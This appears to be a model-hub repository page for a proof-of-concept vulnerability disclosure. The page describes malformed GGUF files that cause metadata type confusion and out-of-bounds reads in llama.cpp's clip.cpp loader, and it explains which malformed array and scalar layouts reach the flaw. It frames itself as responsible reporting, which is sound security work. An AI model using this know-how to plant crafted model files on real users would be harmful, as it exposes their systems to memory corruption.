You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

GGUF clip memory corruption PoC

This repository contains proof-of-concept GGUF files for a llama.cpp clip.cpp metadata type-confusion issue.

Included files:

  • gguf-clip-short-both-u8.gguf
  • gguf-clip-scalar-mean-u8.gguf
  • gen_clip_oob_poc.py

Summary:

  • clip.vision.image_mean and clip.vision.image_std are consumed as float[3]
  • the loader does not verify array-ness, subtype, or minimum length before reading
  • malformed GGUF metadata can therefore be interpreted with the wrong type during model load

Relevant code paths in llama.cpp:

  • tools/mtmd/clip.cpp
  • ggml/src/gguf.cpp

PoC notes:

  • gguf-clip-short-both-u8.gguf stores image_mean and image_std as arr[u8,1]
  • gguf-clip-scalar-mean-u8.gguf stores image_mean as scalar u8
  • both files are valid enough to reach the vulnerable metadata-consumption path during load

This repo is intended for responsible vulnerability reporting and reproduction.

Downloads last month
-
GGUF
Model size
1 params
Architecture
clip
Hardware compatibility
Log In to add your hardware

We're not able to determine the quantization variants.

Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐Ÿ™‹ Ask for provider support